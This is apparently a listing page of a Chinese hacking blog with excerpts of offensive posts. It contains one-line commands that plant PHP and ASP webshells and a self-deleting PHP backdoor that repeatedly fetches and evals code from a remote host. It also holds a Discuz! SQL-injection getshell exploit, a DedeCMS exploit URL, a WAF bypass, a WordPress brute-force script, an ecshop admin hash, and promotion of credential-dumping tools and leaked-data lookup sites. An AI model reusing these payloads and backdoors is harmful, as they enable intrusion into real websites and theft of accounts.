Quarks PwDump各种32位64系统获取HASH

   
分类:安全 | 2015-01-10 | 撸过 9,574 次
0人扯蛋

Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。

它目前可以导出 :
– Local accounts NT/LM hashes + history 本机NT/LM哈希+历史登录记录
– Domain accounts NT/LM hashes + history 域中的NT/LM哈希+历史登录记录
–[......]

继续阅读

cmd生成webshell语句

   
分类:安全 | 2014-12-11 | 撸过 4,604 次
2人扯蛋

linux:echo -e "<?@include(\\$_POST["c"]);?>" > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c
win:      echo ^<%eval request("c")%^> >>webshell.cc.asp                   会再同目录下生成webshell.cc.asp一句话 密码:c

社工库源码搜集

   
分类:安全 | 2014-12-4 | 撸过 39,345 次
11人扯蛋

我接触的第一个社工库源码是Bamaba的源码 一个Asp+Sqlserver的源码 很简陋
社工库源码搜集

大概就是这个界面 13年前后的大多数社工库都是这个源码改的 包括第一代QQ群查询

asp+sqlserver 单表查询
[......]

继续阅读

Discuz! 7.2 SQL注入exp getshell版

   
分类:安全 | 2014-10-1 | 撸过 3,578 次
2人扯蛋

参数:

1.可直接getshell

2.爆管理账号密码

3.爆表前缀

如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。
[......]

继续阅读

K8大牛的C段旁注查询工具 V1.6

   
分类:安全 | 2014-08-8 | 撸过 8,740 次
0人扯蛋

全部复制作者BLOG的懒得写了~

-------------------------------------------------------------------------------------------------------------------------------------------

工具: K8_C段旁注查询工具 V1.6_20140618
编译: VS2012  C# (.NET Framework v4.0)
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2014/6/10 10:19:57

图片: 

V1.6  20140618 效果图  添加对应Banner的图标 这才是更直观 导入导出同样支持图标


[......]

继续阅读

轻松绕各种WAF的POST注入、跨站防御(比如安全狗)

   
分类:安全 | 2014-04-1 | 撸过 2,980 次
2人扯蛋

    XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。

构建如下HTML表单:

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />[......]

继续阅读

PHP 无文件后门

   
分类:安全 | 2013-10-9 | 撸过 6,242 次
5人扯蛋

 

webshell.php

<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);

$remote_file = 'http://xsser.me/webshel.txt';
while($code = file_get_contents($remote_file)){
  @eval($code);
  sleep(5);
};
?>

eval.txt

file_put_contents('1.txt','hello world '.time())[......]

继续阅读

最新WordPress账号密码暴力破解脚本

   
分类:安全 | 2013-09-18 | 撸过 3,047 次
0人扯蛋

 

在做渗透测试的时候,有时候会遇到一个wordpress博客,

如果版本比较新,插件也没有漏洞的话,可以爆破用户名密码来尝试下。

大脑混沌情况下写的,有bug欢迎提出,由于是php的所以跑起来比较慢,

下次发包还是调用命令结合hydra来爆破。

原理是通过URL /?author= 遍历获取用户名,

然后先跑用户名与密码相同的用户,

再调用同目录下pass.txt中的密码文件进行爆破。

默认获取前10个用户,可自行修改。

使用方法:

php wordpress.php http://www.webshell.cc

 

<?php

set_t[......]

继续阅读

DEDE 5.7 综合利用 getshell

   
分类:安全 | 2013-08-20 | 撸过 4,217 次
1人扯蛋

 

修改密码:
 

/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&a[......]

继续阅读

ecshop后台shell技术分享

   
分类:安全 | 2013-08-11 | 撸过 2,964 次
6人扯蛋

之前出了几个ecshop漏洞,得到了密码但是都破解不出来,虽然知道后台。
用户密码 admin:d03a7617433c2826976062fec569a434
ecshop 有一个表ecs_shop_config ,里面有hash_code 貌似2.7.2 和2.7.3都是31693422540744c0a6b6da635b7a5a93

那就用之前的admin的密码和hash_code的 放在一起再一次MD5
md5(d03a7617433c2826976062fec569a43431693422540744c0a6b6da635b7a5a93 )=76bb7b55d4d0b8283fd4[......]

继续阅读